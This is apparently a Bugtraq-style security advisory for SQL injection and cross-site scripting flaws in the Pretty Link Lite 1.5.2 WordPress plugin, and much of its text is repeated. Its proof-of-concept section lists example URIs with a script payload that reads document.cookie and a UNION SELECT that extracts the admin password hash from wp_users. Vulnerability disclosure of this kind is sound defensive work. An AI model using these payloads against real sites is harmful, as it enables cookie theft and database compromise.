Pretty Link Lite WordPress Plugin SQL Injection and Cross Site Scripting Vulnerabilities
BID:53531
Info
Pretty Link Lite WordPress Plugin SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 53531 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 15 2012 12:00AM |
| Updated: | May 15 2012 12:00AM |
| Credit: | Heine Pedersen and Torben Jensen |
| Vulnerable: |
WordPress Pretty Link Lite 1.5.2 |
| Not Vulnerable: | |
Discussion
Pretty Link Lite WordPress Plugin SQL Injection and Cross Site Scripting Vulnerabilities
Pretty Link Lite plugin for WordPress is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pretty Link Lite 1.5.2 is vulnerable; other versions may also be affected.
Pretty Link Lite plugin for WordPress is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pretty Link Lite 1.5.2 is vulnerable; other versions may also be affected.
Exploit / POC
Pretty Link Lite WordPress Plugin SQL Injection and Cross Site Scripting Vulnerabilities
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/wp-content/plugins/pretty-link/pretty-bar.php?url="><script>alert(document.cookie);</script>
http://www.example.com/wp-content/plugins/pretty-link/prli-bookmarklet.php?k=c69dbe5f453820a32b0d0b0bb2098d3d&target_url=%23"><script>alert(document.cookie);</script><a name="
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&action=csv&l=1%20and%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/wp-content/plugins/pretty-link/pretty-bar.php?url="><script>alert(document.cookie);</script>
http://www.example.com/wp-content/plugins/pretty-link/prli-bookmarklet.php?k=c69dbe5f453820a32b0d0b0bb2098d3d&target_url=%23"><script>alert(document.cookie);</script><a name="
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&action=csv&l=1%20and%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1
Solution / Fix
Pretty Link Lite WordPress Plugin SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Pretty Link Lite WordPress Plugin SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- Pretty Link Lite Homepage (WordPress)
- WordPress Homepage (WordPress)